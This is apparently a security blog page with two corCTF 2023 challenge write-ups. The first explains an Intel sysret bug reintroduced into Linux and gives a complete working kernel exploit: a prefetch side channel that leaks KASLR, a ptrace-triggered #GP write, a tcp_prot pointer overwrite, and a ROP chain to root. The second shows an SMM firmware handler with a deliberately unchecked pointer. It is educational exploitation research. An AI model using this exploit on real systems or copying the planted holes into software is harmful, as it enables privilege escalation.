Will's Root: August 2023

Wednesday, August 2, 2023

corCTF 2023 sysruption - Exploiting Sysret on Linux in 2023

Sysruption was a hardware, micro-architectural, and kernel exploitation challenge I wrote for corCTF 2023. It is my personal favorite challenge for this CTF as it tied closely into my first µarch CVE (EntryBleed), showcased the applicability of a µarch attack in a realistic exploit, and was built on the premise of a real hardware bug.

This bug has reappeared multiple times over the years, manifesting first in CVE-2006-0744. It subsequently returned to haunt systems in CVE-2012-0217, affecting FreeBSD, the Xen hypervisor, Solaris, Windows 7, and many other operating systems. People have documented their exploits for different OSes, such as this one for FreeBSD and this one for the Xen hypervisor. To my knowledge, the last publicly known time this bug came back was CVE-2014-4699 on Linux. Since 2014 was before the era of modern kernel mitigations like KASLR, and the previous writeup targeted a system without SMAP and with a writable IDT, the premise of this challenge became exploiting this bug on a modern Linux system with standard hardening features. Before I continue, a huge shout-out must go to zolutal for first-blooding this challenge - he has a really amazing writeup for it!

I first heard about this bug in MIT’s 6.888 Secure Hardware Design course, whose lab assignments also taught me about the prefetch attack that inspired EntryBleed (along with other cool labs like Spectre, Rowhammer, L2 prime and probe, and RISC-V CPU fuzzing). So what exactly is this sysret bug?

According to Intel, this is not a bug (but a feature?) - it’s the software developer’s fault for not carefully reading the documentation. To quote the SDM:

SYSRET is a companion instruction to the SYSCALL instruction. It returns from an OS system-call handler to user code at privilege level 3. It does so by loading RIP from RCX and loading RFLAGS from R11. With a 64-bit operand size, SYSRET remains in 64-bit mode; otherwise, it enters compatibility mode and only the low 32 bits of the registers are loaded.

As the documentation then goes on to state, if RCX holds a non-canonical address, the general protection fault (#GP) is raised while the CPU is still in ring 0, so the ring 0 exception handler runs. In contrast, on AMD the fault happens in userland (which then just crashes the process in ring 3). Because this #GP fires at the very end of the syscall return path, after all the userland registers (including the stack pointer) have been restored but before the CPU has left ring 0, the exception handler will happily start saving the current CPU state onto the user-controlled stack pointer. This effectively gives us an arbitrary write primitive, with the pre-exception register state as the data being written.

To bring back this bug, I applied the following patch to kernel 6.3.4:

```diff
--- orig_entry_64.S
+++ linux-6.3.4/arch/x86/entry/entry_64.S
@@ -150,13 +150,13 @@
	ALTERNATIVE "shl $(64 - 48), %rcx; sar $(64 - 48), %rcx", \
		"shl $(64 - 57), %rcx; sar $(64 - 57), %rcx", X86_FEATURE_LA57
 #else
-	shl	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
-	sar	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
+	# shl	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
+	# sar	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
 #endif
 
	/* If this changed %rcx, it was not canonical */
-	cmpq	%rcx, %r11
-	jne	swapgs_restore_regs_and_return_to_usermode
+	# cmpq	%rcx, %r11
+	# jne	swapgs_restore_regs_and_return_to_usermode
 
	cmpq	$__USER_CS, CS(%rsp)		/* CS must match SYSRET */
	jne	swapgs_restore_regs_and_return_to_usermode
```

This effectively reverts a precise check for non-canonical addresses introduced by this patch.

How exactly do we trigger this bug? The 2014 CVE PoC still applies here, and I borrowed it with a few slight modifications. The PoC chains ptrace and fork in a way that modifies the registers so that the grandchild task attempts to return to a non-canonical address upon sysret. A canonical address is simply one where bits 63 down through the highest implemented virtual address bit (bit 47 with 4-level paging, bit 56 with 5-level paging) are all 1s or all 0s, hence the shl and sar usage in the original check. I was actually surprised that this still worked, as Linux introduced a patch to force irets for this chain of ptrace usage. Fortunately for us, that was removed in a subsequent patch once the stronger check before sysret was introduced.
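To make the canonical-address rule concrete, here is a small C sketch of the check the patch above disables, assuming 48-bit virtual addresses (`__VIRTUAL_MASK_SHIFT` = 47) or 57-bit ones with LA57. The helper names `sign_extend_va` and `is_canonical` are hypothetical, and the sign extension is written with unsigned arithmetic rather than a literal shl/sar, because right-shifting a negative signed value is implementation-defined in C.

```c
#include <stdbool.h>
#include <stdint.h>

/* Sign-extend addr from bit (va_bits - 1). This is what the kernel's
 * "shl $(64 - va_bits), %rcx; sar $(64 - va_bits), %rcx" pair computes,
 * written with unsigned arithmetic so it is well-defined in C.
 * Assumes 1 <= va_bits <= 63. */
static uint64_t sign_extend_va(uint64_t addr, unsigned va_bits)
{
    uint64_t sign_bit = 1ull << (va_bits - 1);
    uint64_t low = addr & ((1ull << va_bits) - 1); /* keep bits [va_bits-1:0] */
    return (low ^ sign_bit) - sign_bit;            /* copy the sign bit upward */
}

/* Canonical iff sign-extension leaves the value unchanged, mirroring
 * "If this changed %rcx, it was not canonical". */
static bool is_canonical(uint64_t addr, unsigned va_bits)
{
    return sign_extend_va(addr, va_bits) == addr;
}
```

With 48-bit addresses, the exploit’s RIP of `0x8fffffffffff1337` fails this check, which is exactly why an unpatched kernel would send it down the `swapgs_restore_regs_and_return_to_usermode` (iret) path instead of executing sysret.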

Unlike in 2014, the Linux kernel now comes with KASLR. This is where the second main component of my challenge comes in: a micro-architectural (or µarch) attack. In my experience talking to people working in the vulnerability research (VR) industry, µarch attacks are often overlooked when developing exploits. Since Spectre and Meltdown, academia has produced a flurry of research on similar attacks, many of which are really fascinating and reveal just how crazy modern hardware is. While some work well and would definitely be applicable in the real world, many others only work in pristine, noiseless lab conditions on specific system configurations, topped off with extremely low leakage rates. Perhaps it is these latter attacks that cause real-world exploit developers to shrug off this attack vector.

As documented in my EntryBleed attack against KPTI and in Project Zero’s writeup for CVE-2022-42703, the prefetch µarch attack from Daniel Gruss is one of the attacks that are extremely fast and accurate at leaking something sensitive (in this case, the KASLR base). Please refer to those links for more information on how the attack works.

Note that the kernel is running without KPTI, so you can also reliably leak other sections of kernel memory aside from text and data (a limitation of EntryBleed). This isn’t me making the challenge easier though: when the Linux kernel detects that a CPU is hardware-mitigated against Meltdown, KPTI is not enabled by default. This is certainly a strange choice (though probably made for performance), as Meltdown is not the only type of µarch attack that can break KASLR through the shared page-table scheme. Regardless, this is perfect for this challenge, as I ran it on a dedicated Cascade Lake server, so KPTI would be disabled by default.

The exploitation strategy from here is to use a prefetch attack to leak the kernel base address, and then choose a target to overwrite in a writable section of the kernel image. But an immediate issue arises: when executing sysret, the kernel is already using the userland GS base because of the preceding swapgs instruction. The GS base is vital for per-CPU data references in the kernel. In fact, when the GPF handler runs with an invalid GS base, it repeatedly page faults until the system gives up and panics, because these handlers access memory at offsets from GS. The exception handler in error_entry only switches to the kernel GS base itself if the exception came from userland.

Like Zolutal, I first attempted to control the userland GS base with arch_prctl (ARCH_SET_GS), but the kernel checks that the value is in the userland address range. There also isn’t really a way for me to find something in kernel data or text to act as a fake gsbase either. Luckily, x86_64 has had the FSGSBASE extension for a while now, which “allows applications to directly write to the FS and GS segment registers.”
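Before relying on wrgsbase, it can be worth checking that the running kernel actually enabled FSGSBASE for userland; otherwise the instruction raises #UD and the process dies with SIGILL. A minimal sketch, assuming Linux’s x86 `HWCAP2_FSGSBASE` bit (bit 1 of `AT_HWCAP2`, from the kernel’s uapi `asm/hwcap2.h`) and glibc’s `getauxval`. The helper names are hypothetical and this check is not part of the original exploit.

```c
#include <stdbool.h>
#include <sys/auxv.h>

/* Bit 1 of AT_HWCAP2 on x86 (HWCAP2_FSGSBASE in the kernel's uapi
 * asm/hwcap2.h); defined here in case the libc headers lack it. */
#ifndef HWCAP2_FSGSBASE
#define HWCAP2_FSGSBASE (1UL << 1)
#endif

/* Pure helper: does this hwcap2 word advertise user-mode FSGSBASE? */
static bool hwcap2_has_fsgsbase(unsigned long hwcap2)
{
    return (hwcap2 & HWCAP2_FSGSBASE) != 0;
}

/* Ask the running kernel. If this returns false, executing wrgsbase
 * from userland raises #UD (delivered as SIGILL). */
static bool kernel_allows_wrgsbase(void)
{
    return hwcap2_has_fsgsbase(getauxval(AT_HWCAP2));
}
```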

Now we need to leak gsbase. It lives in physmap at a constant offset (according to kernel comments, I believe the first percpu chunk always piggybacks off of the linear direct physical mapping, so the offset would depend on the amount of RAM?). In my exploit, I leaked the physmap base by side-channeling the possible range of physmap addresses given in the Linux documentation, then masking the first leaked address and adding the correct offset to obtain gsbase. This approximation has never failed for me yet.
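The masking step is plain arithmetic. This sketch just restates the expression from `main()` in the exploit below: the 4 GiB subtraction and the `0x13bc00000` per-CPU offset are specific to the challenge VM’s memory layout (presumably they would change with a different RAM size), and the 1 GiB rounding relies on the randomized physmap base being 1 GiB-aligned. The function names are hypothetical.

```c
#include <stdint.h>

/* Constants copied from the exploit; specific to the challenge VM only. */
#define GIB_MASK         (~((1ull << 30) - 1)) /* round down to 1 GiB          */
#define FIRST_HIT_OFFSET 0x100000000ull        /* exploit subtracts 4 GiB       */
#define CPU0_GS_OFFSET   0x13bc00000ull        /* cpu0 per-CPU area in physmap  */

/* Recover the physmap base from the first side-channel hit. */
static uint64_t physmap_base_from_leak(uint64_t first_hit)
{
    return (first_hit & GIB_MASK) - FIRST_HIT_OFFSET;
}

/* cpu0's gsbase = physmap base + fixed per-CPU offset. */
static uint64_t cpu0_gsbase_from_leak(uint64_t first_hit)
{
    return physmap_base_from_leak(first_hit) + CPU0_GS_OFFSET;
}
```

For instance, with an unrandomized physmap, a first hit of `0xffff888103456000` yields `0xffff88813bc00000`, the default gsbase hard-coded in the exploit.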

Looking back on the output of my side channel, I didn’t even need to leak physmap to get CPU 0’s gsbase. As this address comes after the linear direct physical mapping and is frequently used, it would likely always be the last address in the physmap range to be side-channeled out of the TLB via a prefetch attack, since this is a one-core system. Of course, this requires the step between probed virtual addresses to line up with the gsbase address, which mine did.

With all the leaks in hand, I presumed that exploitation would be trivial, and first went for common targets like modprobe_path. Unfortunately, the exception handler really trashes the stack, writing around 0x860 bytes of data based on my debugging when I had it target the CEA region. This overwrites a lot of important data and leaves the kernel in a highly unstable state that usually results in a panic quite quickly. Zolutal actually managed to get this working, and he discusses how he achieved it in his writeup.

What ended up working for me were the function pointers in tcp_prot, a technique borrowed from an exploit for CVE-2022-29582. setsockopt then gave me enough register control to stack pivot into another ROP chain (which I wrote ahead of time at an offset from the kernel gsbase during a previous trigger of the sysret bug) and escalate privileges to root.
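Since the #GP frame is saved at the attacker-chosen RSP, picking that RSP boils down to arithmetic on `struct pt_regs`. The sketch below is a reconstruction, not code from the exploit, and it assumes that a ring-0 #GP on x86-64 Linux does not switch to an IST stack, that the CPU aligns RSP down to 16 bytes before pushing its frame, and that the saved `pt_regs` ends exactly there. It ignores everything the handler writes further down the stack afterward. Under those assumptions the exploit’s constants line up: with RSP = `tcp_prot + 0xb8`, r9 lands at `tcp_prot + 0x48` (which, counting `struct proto`’s leading function pointers, should be the `setsockopt` slot the exploit targets), and with RSP = `gsbase + 0x860`, r14 lands at `gsbase + 0x7c0`, the pointer later passed to setsockopt. The enum and function names are hypothetical.

```c
#include <stdint.h>

/* x86-64 struct pt_regs field order (lowest address first). The CPU pushes
 * SS..RIP plus the error code (stored in orig_ax); entry code pushes the rest. */
enum pt_regs_slot {
    SLOT_R15, SLOT_R14, SLOT_R13, SLOT_R12, SLOT_RBP, SLOT_RBX,
    SLOT_R11, SLOT_R10, SLOT_R9, SLOT_R8, SLOT_RAX, SLOT_RCX,
    SLOT_RDX, SLOT_RSI, SLOT_RDI, SLOT_ORIG_RAX, SLOT_RIP, SLOT_CS,
    SLOT_EFLAGS, SLOT_RSP, SLOT_SS,
    SLOT_COUNT /* 21 slots * 8 bytes = 0xa8 */
};

/* Address where `slot` is saved if a ring-0 #GP fires with RSP = rsp,
 * under the assumptions stated above. */
static uint64_t pt_regs_slot_addr(uint64_t rsp, enum pt_regs_slot slot)
{
    uint64_t frame_top = rsp & ~0xfull;                        /* 16-byte alignment */
    uint64_t regs_base = frame_top - (uint64_t)SLOT_COUNT * 8; /* start of pt_regs  */
    return regs_base + (uint64_t)slot * 8;
}
```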

Originally, I enabled oops=panic and intended for players to disable that setting with the first iteration of the sysret bug so they could continue exploitation, since the general protection fault leads to an oops. I wasn’t able to achieve this myself due to how the GPF handler trashes the stack, but since Zolutal managed to get the modprobe_path overwrite working, this might be feasible too.

The following is my exploit and its successful exploitation of the challenge:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <assert.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

void pfail(char *str)
{
    perror(str);
    _exit(-1);
}

void assign_to_core(int core_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);
    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0)
        pfail("sched_setaffinity");
}

// time a prefetch of addr; a low latency suggests the translation is cached in the TLB
uint64_t sidechannel(uint64_t addr)
{
    uint64_t a, b, c, d;
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

// #define ITERATIONS 1
// this needs to be fine tuned to work best for the gsbase and kbase leak
#define THRESHOLD 50
// 8 gb more than enough
#define POTENTIAL_END (8ull << 30)

int threshold = THRESHOLD;

uint64_t prefetch_leak(uint64_t scan_start, uint64_t scan_end, uint64_t step)
{
    uint64_t size = (scan_end - scan_start) / step;
    uint64_t *data = calloc(size, sizeof(uint64_t));
    uint64_t addr = ~0, potential_end = 0;

    do {
        bool set = false;
        for (uint64_t idx = 0; idx < size; idx++) {
            uint64_t test_addr = scan_start + idx * step;
            if (potential_end && test_addr > potential_end)
                break;
            syscall(104); // getgid: enter the kernel so its recently used translations are TLB-hot
            uint64_t time = sidechannel(test_addr);
            if (time < threshold) {
                printf("%llx %llu\n", (unsigned long long)test_addr, (unsigned long long)time);
                data[idx]++;
                if (!potential_end)
                    potential_end = test_addr + POTENTIAL_END;
            }
        }
        // take the first candidate that scored at least one sub-threshold hit
        for (uint64_t i = 0; i < size; i++) {
            if (!set && data[i] >= 1) {
                addr = scan_start + i * step;
                set = true;
            }
        }
    } while (addr == ~0);

    free(data);
    return addr;
}

#define KERNEL_STEP 0x200000ull
#define KERNEL_BOTTOM 0xffffffff80000000ull
#define KERNEL_TOP 0xffffffffc0000000ull
#define PHYSMAP_STEP 0x200000ull
#define PHYSMAP_BOTTOM 0xffff888000000000ull
#define PHYSMAP_TOP 0xffffc88000000000ull

uint64_t kbase = 0xffffffff81000000ull;
uint64_t curr_cpu_gsbase = 0xffff88813bc00000ull;

// gadget and symbol offsets relative to the unrandomized kernel base
uint64_t trampoline = 0xffffffff81a00ee1ull - 0xffffffff81000000ull;
uint64_t pop_rsp = 0xffffffff811083d0ull - 0xffffffff81000000ull;
uint64_t pop_rsp_rsi = 0xffffffff81514860ull - 0xffffffff81000000ull;
uint64_t push_rcx_jmp_ptr_rcx = 0xffffffff8136b694ull - 0xffffffff81000000ull;
uint64_t pop_rsi_rdi_rbp = 0xffffffff81f006d9ull - 0xffffffff81000000ull;
uint64_t pop_rdi_rcx = 0xffffffff81cda0b8ull - 0xffffffff81000000ull;
uint64_t pop_rdi = 0xffffffff811d63f3ull - 0xffffffff81000000ull;
uint64_t tcp_prot = 0xffffffff82160180ull - 0xffffffff81000000ull;
uint64_t commit_creds = 0xffffffff8109b810ull - 0xffffffff81000000ull;
uint64_t init_cred = 0xffffffff8203ade0ull - 0xffffffff81000000ull;

void nopper(struct user_regs_struct *regs) {}

void overwrite_ioctl(struct user_regs_struct *regs)
{
    regs->r9 = push_rcx_jmp_ptr_rcx;
}

void *stack_addr = NULL;

void win()
{
    int fd = open("/root/flag.txt", O_RDONLY);
    char buf[300];
    int n = read(fd, buf, sizeof(buf));
    write(1, buf, n);
    puts("r000000000t");
    system("/bin/sh");
}

// landing point back in userland: rebuild an aligned stack near main's frame, then call win()
__attribute__((naked)) void escaped_from_hell()
{
    asm volatile(
        ".intel_syntax noprefix;"
        "lea rsp, qword ptr [rip + stack_addr];"
        "mov rsp, qword ptr [rsp];"
        "mov rax, 0xff;"
        "not rax;"
        "and rsp, rax;"
        "push rax;"
        "call win;"
        ".att_syntax;"
        :::);
}

void trigger_sysret_bug(uint64_t stack, void (*setup_regs)(struct user_regs_struct *reg))
{
    struct user_regs_struct regs;
    int status;
    pid_t chld;

    if ((chld = fork()) < 0) {
        perror("fork");
        exit(1);
    }

    if (chld == 0) {
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
            perror("PTRACE_TRACEME");
            exit(1);
        }
        raise(SIGSTOP);
        // if ptrace set regs too many at once, simply just fails and never triggers sysret bug
        // not sure why this is the case, so set registers before ptrace
        asm volatile(
            ".intel_syntax noprefix;"
            "mov r14, qword ptr [pop_rsp_rsi];"
            "mov r13, qword ptr [pop_rdi];"
            "mov r12, qword ptr [init_cred];"
            "mov rbp, qword ptr [commit_creds];"
            "mov rbx, qword ptr [trampoline];"
            "mov r11, 0xdeadbeef;"
            "mov r10, 0xbaadf00d;"
            "lea r9, qword ptr [rip + escaped_from_hell];"
            "mov r8, 0x33;"
            // no need for stack, we can restore in naked function in asm, otherwise interfere with rax
            "mov rdx, 0x2b;"
            "mov rax, 57;" // fork
            "syscall;"
            "ud2;"
            ".att_syntax;"
            :::);
    }

    waitpid(chld, &status, 0);
    ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
    ptrace(PTRACE_CONT, chld, 0, 0);
    waitpid(chld, &status, 0);

    // make the pending sysret "return" to a non-canonical RIP with our chosen RSP
    ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    regs.rcx = 0x8fffffffffff1337;
    regs.rip = 0x8fffffffffff1337;
    regs.rsp = stack;
    setup_regs(&regs);
    ptrace(PTRACE_SETREGS, chld, NULL, &regs);
    ptrace(PTRACE_CONT, chld, 0, 0);
    ptrace(PTRACE_DETACH, chld, 0, 0);
    exit(0);
}

int main(int argc, char **argv)
{
    assign_to_core(0);
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (argc == 2)
        threshold = atoi(argv[1]);

    // current threshold causes it to leak etext
    kbase = prefetch_leak(KERNEL_BOTTOM, KERNEL_TOP, KERNEL_STEP) - 0xc00000;
    curr_cpu_gsbase = (prefetch_leak(PHYSMAP_BOTTOM, PHYSMAP_TOP, PHYSMAP_STEP) & ~((1ull << 30) - 1)) - 0x100000000 + 0x13bc00000;
    uint64_t evil_stack = curr_cpu_gsbase + 0x860;
    printf("kbase: 0x%lx\n", kbase);
    printf("current cpu gsbase: 0x%lx\n", curr_cpu_gsbase);

    stack_addr = &fd;
    trampoline += kbase;
    pop_rsp += kbase;
    pop_rsp_rsi += kbase;
    push_rcx_jmp_ptr_rcx += kbase;
    pop_rsi_rdi_rbp += kbase;
    pop_rdi_rcx += kbase;
    pop_rdi += kbase;
    tcp_prot += kbase;
    commit_creds += kbase;
    init_cred += kbase;
    printf("stack pivot: 0x%lx\n", push_rcx_jmp_ptr_rcx);

    // point the userland GS base at the kernel's per-CPU area so the #GP handler survives
    asm volatile(
        ".intel_syntax noprefix;"
        "mov rax, %0;"
        "wrgsbase rax;"
        ".att_syntax;"
        :: "r"(curr_cpu_gsbase) : "rax");
    puts("calling wrgsbase");

    puts("writing rop chain into current cpu gs base");
    // write rop chain to gs base first
    if (fork() == 0)
        trigger_sysret_bug(evil_stack, &nopper);
    wait(NULL);
    sleep(1);

    evil_stack = tcp_prot + 0xb8;
    // overwrite ioctl in tcp proto
    puts("overwriting tcp_prot func pointers");
    if (fork() == 0)
        trigger_sysret_bug(evil_stack, &overwrite_ioctl);
    wait(NULL);
    sleep(1);
    getchar();

    // target setsockopt func ptr
    puts("triggering ROP");
    setsockopt(fd, SOL_TCP, TCP_ULP, (void *)(curr_cpu_gsbase + 0x7c0), 0x1337);
    puts("hi");
}
```

One interesting thing to notice in the exploit is my adjusted prefetching strategy. In my original EntryBleed PoC, I used simple averages. After doing a lot more micro-architectural attacks in the past year, I believe scoring leak candidates with a threshold system is a much better strategy, as it is less susceptible to extreme outliers that would skew an average. The threshold differs across CPUs, but it is not difficult to enumerate. Sometimes the leak in my exploit is wrong (especially for the kernel base), but I hypothesize that the accuracy could be improved by performing a ton of memory accesses beforehand to help flush the TLB a bit more.
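To illustrate why thresholds hold up better than averages, here is a small, self-contained comparison that operates on a matrix of latency samples. The exploit itself simply takes the first candidate with at least one sub-threshold hit; `pick_by_threshold` below is a slightly more general, hypothetical variant that picks the candidate with the most hits, and `pick_by_mean` stands in for the older averaging approach.

```c
#include <stddef.h>
#include <stdint.h>

/* times[c * rounds + r] = prefetch latency of candidate c in round r.
 * Threshold scoring: count rounds below `threshold`; the candidate with the
 * most hits wins (lowest index on ties). Returns -1 if nothing ever hits. */
static long pick_by_threshold(const uint64_t *times, size_t candidates,
                              size_t rounds, uint64_t threshold)
{
    long best = -1;
    size_t best_hits = 0;
    for (size_t c = 0; c < candidates; c++) {
        size_t hits = 0;
        for (size_t r = 0; r < rounds; r++)
            if (times[c * rounds + r] < threshold)
                hits++;
        if (hits > best_hits) {
            best_hits = hits;
            best = (long)c;
        }
    }
    return best;
}

/* Averaging: the lowest total (equivalently, mean) latency wins, so one huge
 * outlier, such as an interrupt mid-measurement, can hide the real hit. */
static long pick_by_mean(const uint64_t *times, size_t candidates, size_t rounds)
{
    long best = -1;
    uint64_t best_sum = UINT64_MAX;
    for (size_t c = 0; c < candidates; c++) {
        uint64_t sum = 0;
        for (size_t r = 0; r < rounds; r++)
            sum += times[c * rounds + r];
        if (sum < best_sum) {
            best_sum = sum;
            best = (long)c;
        }
    }
    return best;
}
```

For example, if one candidate measures 30, 35, 5000, and 32 cycles and another measures 60, 55, 58, and 61, a threshold of 50 picks the first (3 hits versus 0), while averaging picks the second (a mean of 58.5 versus about 1274). These are made-up numbers, not real measurements.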

This concludes my writeups for corCTF 2023! Feel free to ask any questions about this or point out any mistakes. I hope people had a lot of fun with sysruption, especially as it combined a hardware quirk, a µarch attack, and a kernel exploit in one challenge as the description mentioned 😉. Congrats once again to Zolutal for the first blood, and to sampriti and team Balsn for second and third bloods, and thanks again to 6.888 for inspiring the components for this challenge!

corCTF 2023 smm-diary: Ropping in Ring -2

smm-diary was a medium-difficulty pwnable challenge I wrote this year for corCTF 2023. I spent some time in the past year playing around with System Management Mode and reading up on binarly.io SMM CVEs, and thought it could make for a unique challenge to get players familiar with exploiting something new. Before continuing, I would like to give a shoutout to zhuyifei1999 for his CowSay series in UIUCTF 2022, which got me into SMM, and to MeBeim for his writeups on CowSay. Funnily enough, these were the very two people who took first and second blood on my SMM challenge in corCTF this year.

To start off, we were given the following QEMU run script:

```sh
#!/bin/sh
./qemu-system-x86_64 \
    -m 4096M \
    -smp 1 \
    -kernel "./bzImage" \
    -append "console=ttyS0 panic=-1 ignore_loglevel pti=on" \
    -netdev user,id=net \
    -device e1000,netdev=net \
    -display none \
    -vga none \
    -serial stdio \
    -monitor /dev/null \
    -machine q35,smm=on,accel=tcg \
    -cpu max \
    -initrd "./initramfs.cpio.gz" \
    -global driver=cfi.pflash01,property=secure,value=on \
    -drive if=pflash,format=raw,unit=0,file=./FV/OVMF_CODE.fd,readonly=on \
    -drive if=pflash,format=raw,unit=1,file=./FV/OVMF_VARS.fd,readonly=on \
    -global ICH9-LPC.disable_s3=1 \
    -debugcon file:/dev/null \
    -global isa-debugcon.iobase=0x402 \
    -no-reboot
```

We were also given the following OVMF EDK2 patch on commit 16779ede2d366bfc6b702e817356ccf43425bcc8 (of course the flag was replaced with a dummy test flag in the distributed patch):

```diff
diff --git a/OvmfPkg/Corctf/Corctf.c b/OvmfPkg/Corctf/Corctf.c
new file mode 100644
index 0000000..4122dbc
--- /dev/null
+++ b/OvmfPkg/Corctf/Corctf.c
@@ -0,0 +1,141 @@
+#include <Uefi.h>
+#include <Library/UefiLib.h>
+#include <Library/BaseLib.h>
+#include <Library/BaseMemoryLib.h>
+#include <Library/DebugLib.h>
+#include <Library/PcdLib.h>
+#include <Library/SmmServicesTableLib.h>
+
+#include "Corctf.h"
+
+const CHAR8 *Flag = "corctf{uNch3CKeD_c0Mm_BufF3r:(}";
+
+typedef struct
+{
+  UINT8 Note[16];
+}DIARY_NOTE;
+
+#define NUM_PAGES 20
+
+DIARY_NOTE Book[NUM_PAGES];
+
+#define ADD_NOTE 0x1337
+#define GET_NOTE 0x1338
+#define DUMP_NOTES 0x31337
+
+typedef struct
+{
+  UINT32 Cmd;
+  UINT32 Idx;
+  union TRANSFER_DATA
+  {
+    DIARY_NOTE Note;
+    UINT8 *Dest;
+  } Data;
+}COMM_DATA;
+
+VOID
+TransferNote (
+  IN DIARY_NOTE *Note,
+  IN UINT32 Idx,
+  IN BOOLEAN In
+  )
+{
+  if (In)
+  {
+    CopyMem(&Book[Idx], Note, sizeof(DIARY_NOTE));
+  }
+  else
+  {
+    CopyMem(Note, &Book[Idx], sizeof(DIARY_NOTE));
+  }
+}
+
+VOID
+DumpNotes (
+  IN UINT8 *Dest
+  )
+{
+  CopyMem(Dest, &Book, sizeof(Book));
+}
+
+EFI_STATUS
+EFIAPI
+CorctfSmmHandler (
+  IN EFI_HANDLE DispatchHandle,
+  IN CONST VOID *Context OPTIONAL,
+  IN OUT VOID *CommBuffer OPTIONAL,
+  IN OUT UINTN *CommBufferSize OPTIONAL
+  )
+{
+  COMM_DATA *CommData = (COMM_DATA *)CommBuffer;
+
+  if (*CommBufferSize != sizeof(COMM_DATA))
+  {
+    DEBUG((DEBUG_INFO, "Invalid size passed to %a\n", __FUNCTION__));
+    DEBUG((DEBUG_INFO, "Expected Size: 0x%lx, got 0x%lx\n", sizeof(COMM_DATA), *CommBufferSize));
+    goto Failure;
+  }
+
+  if ((CommData->Cmd == ADD_NOTE || CommData->Cmd == GET_NOTE) && CommData->Idx >= NUM_PAGES)
+  {
+    DEBUG((DEBUG_INFO, "Invalid idx passed to %a\n", __FUNCTION__));
+    goto Failure;
+  }
+
+  switch (CommData->Cmd)
+  {
+    case ADD_NOTE:
+      TransferNote(&(CommData->Data.Note), CommData->Idx, TRUE);
+      break;
+    case GET_NOTE:
+      TransferNote(&(CommData->Data.Note), CommData->Idx, FALSE);
+      break;
+    case DUMP_NOTES:
+      DumpNotes(CommData->Data.Dest);
+      break;
+    default:
+      DEBUG((DEBUG_INFO, "Invalid cmd passed to %a, got 0x%lx\n", __FUNCTION__, CommData->Cmd));
+      goto Failure;
+  }
+
+  return EFI_SUCCESS;
+
+  Failure:
+  *CommBufferSize = -1;
+  return EFI_SUCCESS;
+}
+
+EFI_STATUS
+EFIAPI
+CorctfSmmInit (
+  IN EFI_HANDLE ImageHandle,
+  IN EFI_SYSTEM_TABLE* SystemTable
+  )
+{
+  EFI_STATUS Status;
+  EFI_HANDLE DispatchHandle;
+
+  ASSERT (FeaturePcdGet (PcdSmmSmramRequire));
+  DEBUG ((DEBUG_INFO, "Corctf Diary Note Handler initiailizing\n"));
+  Status = gSmst->SmiHandlerRegister (
+                    CorctfSmmHandler,
+                    &gEfiSmmCorctfProtocolGuid,
+                    &DispatchHandle
+                    );
+
+  if (EFI_ERROR (Status))
+  {
+    DEBUG ((DEBUG_ERROR, "%a: SmiHandlerRegister(): %r\n",
+      __FUNCTION__, Status));
+  }
+  else
+  {
+    DEBUG ((DEBUG_INFO, "Corctf SMM Diary Note handler installed successfully!\n"));
+    DEBUG ((DEBUG_INFO, "Unlike heap notes, storing your notes in SMM will give you true secrecy!\n", 0));
+    DEBUG ((DEBUG_INFO, "This place is so secretive that we even hid a flag in here!\n"
+      "Just to tease you a bit, the first few characters are: %.6a\n", Flag));
+  }
+
+  return Status;
+}
\ No newline at end of file
diff --git a/OvmfPkg/Corctf/Corctf.h b/OvmfPkg/Corctf/Corctf.h
new file mode 100644
index 0000000..5f57570
--- /dev/null
+++ b/OvmfPkg/Corctf/Corctf.h
@@ -0,0 +1,7 @@
+#include <Uefi.h>
+
+// b888a84d-2888-480e-9583-813725fd398b
+#define EFI_CORCTF_SMM_PROTOCOL_GUID \
+  { 0xb888a84d, 0x3888, 0x480e, { 0x95, 0x83, 0x81, 0x37, 0x25, 0xfd, 0x39, 0x8b } }
+
+extern EFI_GUID gEfiSmmCorctfProtocolGuid;
\ No newline at end of file
diff --git a/OvmfPkg/Corctf/Corctf.inf b/OvmfPkg/Corctf/Corctf.inf
new file mode 100644
index 0000000..f5b0e72
--- /dev/null
+++ b/OvmfPkg/Corctf/Corctf.inf
@@ -0,0 +1,30 @@
+[Defines]
+  INF_VERSION = 1.29
+  BASE_NAME = CorCtfSmm
+  FILE_GUID = 6217a808-f2d4-4c7b-a50e-7f8803b8d316
+  MODULE_TYPE = DXE_SMM_DRIVER
+  ENTRY_POINT = CorctfSmmInit
+  PI_SPECIFICATION_VERSION = 0x00010046
+
+[sources]
+  Corctf.h
+  Corctf.c
+
+[Packages]
+  MdePkg/MdePkg.dec
+  OvmfPkg/OvmfPkg.dec
+
+[LibraryClasses]
+  UefiDriverEntryPoint
+  UefiLib
+  PcdLib
+  SmmServicesTableLib
+
+[Protocols]
+  gEfiSmmCorctfProtocolGuid
+
+[FeaturePcd]
+  gUefiOvmfPkgTokenSpaceGuid.PcdSmmSmramRequire
+
+[Depex]
+  TRUE
\ No newline at end of file
